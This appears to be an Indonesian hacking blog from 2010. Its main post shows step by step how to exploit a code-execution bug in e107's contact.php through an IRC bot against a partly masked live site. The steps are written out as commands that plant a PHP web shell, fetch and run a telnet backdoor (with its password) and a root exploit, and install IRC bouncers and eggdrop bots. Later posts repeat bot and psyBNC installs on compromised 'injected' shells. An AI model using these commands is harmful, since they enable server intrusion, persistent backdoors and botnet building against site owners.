psyBNC By GOGON bisa di Dowload di sini http://server60.zoomshare.com/files/indo.tar.gz
Selasa, 30 November 2010
Jumat, 16 Juli 2010
Hacking e107 Website
Apa itu e107?
"e107 is a content management system written in PHP and using the popular open source MySQL database system for content storage. It's completely free, totally customisable and in constant development." (http://e107.org/news.php).
Software gratisan yang memudahkan kita membangun sebuah website dinamis.
"e107 is a content management system written in PHP and using the popular open source MySQL database system for content storage. It's completely free, totally customisable and in constant development." (http://e107.org/news.php).
Software gratisan yang memudahkan kita membangun sebuah website dinamis.
Banyak sekali pengguna e107 hingga popularitas software ini tak kalah hebatnya dengan joomla! dan Drupal.
Tapi taukah Anda bahwa e107 free software ini memuat bugz di file /contact.php? Dengan cara yang sederhana Anda bisa melakukan tanam shell, instal telnet, get access root, deface, instal Unreal, psyBNC, bot, waduh.. parah... kasian shellnya nanti ae...
Udah ah basa-basinya, berikut cara hacking website e107 (ingat, note ini sekedar pembelajaran akan arti ketaksempurnaan, bukan untuk mengajarkan kerusakan. Segala penyalahgunaan informasi dari note ini adalah semata-mata menjadi tanggung jawab Anda. )
Pakai bot ini e107 scanner untuk scanning target dan eksploitasi (biar cepet & mudah ja). Anda juga bisa baca2 sistematika eksploitasinya http://www.exploit-db.com/exploits/12715
on IRCnetwork:
!e107 "This site is powered by e107"
Pilih satu target misal: http://www.f*asher.msk.su/contact.php
Mau apa sekarang? pilih ini salah satu:
1. Mengetahui direktori home
!cmd www.f*asher.msk.su exec(pwd)
Hasil: /home/sloki/user/t85564/sites/everybodylovesirene.com/www/v2
2. List file and folder suatu direktori
!cmd www.f*asher.msk.su exec('cd /var/tmp; ls')
3. Mengetahui current folder yang fullwrite
!cmd www.f*asher.msk.su exec(base64_decode(\'ZmluZCAuIC10eXBlIGQgLXBlcm0gLTIgLWxz'\))
Hasil: /new/e107_files/cache
4. Tanam shell
!cmd www.f*asher.msk.su exec('cd /usr/home/bkdevils/domains/flasher.msk.su/public_html/magazin/templates_c;fetch http://ravenzzz.fileave.com/fxshell.txt;mv fxshell.txt shell.php;')
kalo berhasil, php shell berbentuk: http://www.f*asher.msk.su//magazin/templates_c/shell.php?
5. Install telnet
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://t.i.a.n.tripod.com/data/blind.tar.gz;tar -zxvf blind.tar.gz;rm blind.tar.gz;./blind;rm -rf blind ')
host: www.f*asher.msk.su
port: 1953
password: samboda
6. install root
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/root.pl;perl root.pl ')
7. install psyBNC
!cmd www.f*asher.msk.su ('cd /var/tmp;$h http://cimpli.uni.cc/irc/psy.tgz;tar -zxvf psy.tgz;rm psy.tgz;cd .cpanel;./config rontok 5566;./run psybnc')
8. Install eggdrop
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/e.tgz;tar -zxvf e.tgz;rm e.tgz ;cd .httpd;./crot nick ident ip channel owner;./run nick')
* Kalo perlu wget sekalian terobot.conf yang sudah Anda edit
9. Install bot perl
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget www.loyalmoses.com/junk/vopcrew_multiscanner.txt;perl vopcrew_multiscanner.txt')
10. Mengetahui type kernel
!cmd www.f*asher.msk.su php_uname()
hasil: Linux srv140 2.6.26-2-vserver-amd64 #1 SMP Thu Feb 11 02:19:12 UTC 2010 x86_64
11. mengetahui disable commands
!cmd www.f*asher.msk.su ini_get('disable_functions')
hasil:
disk_total_space, diskfreespace, exec, system, popen, proc_open, proc_nice, shell_exec, passthru, dl
Botnya serasa terintegrasi dengan shell, attacker bisa mengelola shell layaknya login telnet. Anda bisa mereplace index.php juga lho hati2 dengan defacing..
- Bagi Anda pemakai e107, saya sarankan segera patching bug di site Anda, biar aman gitu.. Join di e107 community untuk mendapatkan informasi terkait e107. Site Keren, Secure Aman..
Sabtu, 10 Juli 2010
Minggu, 04 Juli 2010
CARA MEMBUAT bot eggdrop
CARA BUAT BOT eggdrop
#######################################
“cara bikin bot eggdrop RAWE tcl ”
######################################
1. pertama login ke shell inject anda yang ada di atas
2. wget geocities.com/tusukaja/apiz.tar.gz
3. tar -zxvf apiz.tar.gz
4. cd .dat
5. ./ayu conf botnick identbot ip-shell channel owner
misal :
./ayu conf TestBot ident 192.168.0.2 kabrut ableh <– channel nggak pakai “#” – untuk melihat ip shell anda ketik –> //sbin/ifconfig atau ifconfig
6. ./dssl conf
7. /msg botnick hello <– di mirc
#######################################
“cara bikin bot eggdrop RAWE tcl ”
######################################
1. pertama login ke shell inject anda yang ada di atas
2. wget geocities.com/tusukaja/apiz.tar.gz
3. tar -zxvf apiz.tar.gz
4. cd .dat
5. ./ayu conf botnick identbot ip-shell channel owner
misal :
./ayu conf TestBot ident 192.168.0.2 kabrut ableh <– channel nggak pakai “#” – untuk melihat ip shell anda ketik –> //sbin/ifconfig atau ifconfig
6. ./dssl conf
7. /msg botnick hello <– di mirc
8. Jangan lupa auth + passnya ya.. Enjoy
Tinggal tunggu di MIRC apa botnya nongol.. Hehehe..
Selamat mencoba...
CARA MEMBUAT psyBNC
Buat psyBNC
kalu sudah punya target pasti ada injek,qita bisa pakek r57/c99 tapi Gue biasanya pakek injekan
aku sendiri kalau aku pakek ini http://h1.ripway.com/stevf57/injek.txt??
nah kalu sudah kita tinggal buuat dechh..
1. wget http://h1.ripway.com/stevf57/psybnc.tar.gz atau
2. lwp-download wget http://h1.ripway.com/stevf57/psybnc.tar.gz
3. tar -zxvf psybnc.tar.gz
4. cd .psy
5. ./config port (contoh ./config 2121)
6. ./fuck
7. ./run
selesai dehhh buat nya...sekarang tinggal buka MIRC trus ketik /server ip-shell portnya
contoh : /server 120.581.25.37:2121
Alo brow.... selamat datang di blog ini, kami ciptakan blog ini untuk saling tukar informasi mengenai dunia IRC, Ok.. tanpa banyak basa basi kita mulai membahas mengenai psyBNC, apa itu psyBNC ???!! untuk yang sering chating meski ga awam dengan kata² itu, tapi yang belum mengenal psyBNC kami coba untuk menjelaskannya.
psyBNC adalah salah satu software yang dapat anda gunakan untuk bisa memakai Ip shell yang anda punya untuk keperluan IRC dan merupakan pengembangan dari BNC. Apa keuntungan psyBNC ? Anda akan dapat ter-lindungi dari Winukes dan flood, dan juga nick anda bisa online 24 jam. Nah... bagaimana cara membuatnya ?? ikuti langkah berikut.
Syarat untuk mengistall psyBNC ada harus dan wajib memiliki shell, kalian yang belum tau apa iru shell ?? tanya aja di mbah google.com
kita coba untuk mengistall psyBNC dengan instan.
Pertama login ke shell kamu, dan ikuti langkah² berikut ini :
* wget http://h1.ripway.com/stevf57/psy.tar.gz
* tar -zxvf psy.tar.gz
* rm psyc.tar.gz
* cd psybnc
* rm scripts/DEFAULT.SCRIPT
* ./kik "process" ./psybnc
kalau kamu sudah menjalankan perintah di atas maka akan muncul gini:
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---., .--. ,-., ----.- ,
| O || ,-' \ \/ / | o | | \ | || ,---- '
| _/ \ \ \ / | o< | |\ || |__
|_| |__/ |_| |__| | _| \_| \___|
Version 2.3.1 (c) 1999-2002
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 5360
psyBNC2.3.1-cBtITLdDMSNp started (PID 10525)
Mantabsss...!! psyBNC sudah terinstall pada server shell kamu. Bagaimana langkah untuk menjalankan psyBNC nya ??? ikuti langkah dibawah ini :
Buka mIRC kamu
psyBNC adalah sebuah bouncer untuk dipergunakan dalam IRC. maksud dari bouncer disini adalah seperti mirror dimana kita melakukan koneksi ke server IRC melalui bouncer tersebut.
langkah-langkah pembuatan adalah:
pertama yang mesti dilakukan adalah,kamu harus mempunyai shell ato bisa juga di sebut targetkalu sudah punya target pasti ada injek,qita bisa pakek r57/c99 tapi Gue biasanya pakek injekan
aku sendiri kalau aku pakek ini http://h1.ripway.com/stevf57/injek.txt??
nah kalu sudah kita tinggal buuat dechh..
1. wget http://h1.ripway.com/stevf57/psybnc.tar.gz atau
2. lwp-download wget http://h1.ripway.com/stevf57/psybnc.tar.gz
3. tar -zxvf psybnc.tar.gz
4. cd .psy
5. ./config port (contoh ./config 2121)
6. ./fuck
7. ./run
selesai dehhh buat nya...sekarang tinggal buka MIRC trus ketik /server ip-shell portnya
contoh : /server 120.581.25.37:2121
Cara Bikin psyBNC (port 5360)
sebelum memulai kita simak dulu di bawah iniAlo brow.... selamat datang di blog ini, kami ciptakan blog ini untuk saling tukar informasi mengenai dunia IRC, Ok.. tanpa banyak basa basi kita mulai membahas mengenai psyBNC, apa itu psyBNC ???!! untuk yang sering chating meski ga awam dengan kata² itu, tapi yang belum mengenal psyBNC kami coba untuk menjelaskannya.
psyBNC adalah salah satu software yang dapat anda gunakan untuk bisa memakai Ip shell yang anda punya untuk keperluan IRC dan merupakan pengembangan dari BNC. Apa keuntungan psyBNC ? Anda akan dapat ter-lindungi dari Winukes dan flood, dan juga nick anda bisa online 24 jam. Nah... bagaimana cara membuatnya ?? ikuti langkah berikut.
Syarat untuk mengistall psyBNC ada harus dan wajib memiliki shell, kalian yang belum tau apa iru shell ?? tanya aja di mbah google.com
kita coba untuk mengistall psyBNC dengan instan.Pertama login ke shell kamu, dan ikuti langkah² berikut ini :
* wget http://h1.ripway.com/stevf57/psy.tar.gz
* tar -zxvf psy.tar.gz
* rm psyc.tar.gz
* cd psybnc
* rm scripts/DEFAULT.SCRIPT
* ./kik "process" ./psybnc
kalau kamu sudah menjalankan perintah di atas maka akan muncul gini:
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---., .--. ,-., ----.- ,
| O || ,-' \ \/ / | o | | \ | || ,---- '
| _/ \ \ \ / | o< | |\ || |__
|_| |__/ |_| |__| | _| \_| \___|
Version 2.3.1 (c) 1999-2002
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 5360
psyBNC2.3.1-cBtITLdDMSNp started (PID 10525)
Mantabsss...!! psyBNC sudah terinstall pada server shell kamu. Bagaimana langkah untuk menjalankan psyBNC nya ??? ikuti langkah dibawah ini :
Buka mIRC kamu
- Masuk Options, pilih menu catagory connect, pilih identd masukkan ident sesuai yang kamu inginkan " contoh : admin <---- berarti kamu menggunakan ident : admin " kedalam kolom User ID, untuk System dan Port nya biarkan sesuai settingan standard aja.
- Masukkan server shell kamu, contoh : /server abrakadabra.com 5360 <---- berarti kamu terkoneksi pada server abrakadabra.com dengan port 5360, Ingat !!! untuk installasi psyBNC ini port gak bisa kita ubah alias paten dengan menggunakan port 5360.
- Masukkan password psyBNC kamu ( terserah apa aja dech,sesuka kamu !! bisa nama asli kamu,cewek kamu,nenek kamu,buyut kamu... siapa aja dech yang penting kamu hafal dan mudah diingat,kalo perlu catat di notepad simpan di drive ato kamu juga bisa tato password itu kebadan kamu kalo kamu kurang kerjaan sehh...
) - Addserver irc, contoh : /addserver irc.plasa.net:6667 <--- kamu masuk server allnetwork, jangan lupa ya pajang psyBNC baru kamu di #cerme
Selesai sudah install psyBNC nya. - catatan : Tidak semua server shell bisa support dengan port 5360 ini lo..., kalo saat eksekusi tertulis port aborting....., berarti kamu gagal untuk mengistall psyBNC jenis ini kedalam server shell kamu dengan menggunakan prepsybnc, cara lainnya adalah mengistall psyBNC precompile
Langganan:
Postingan (Atom)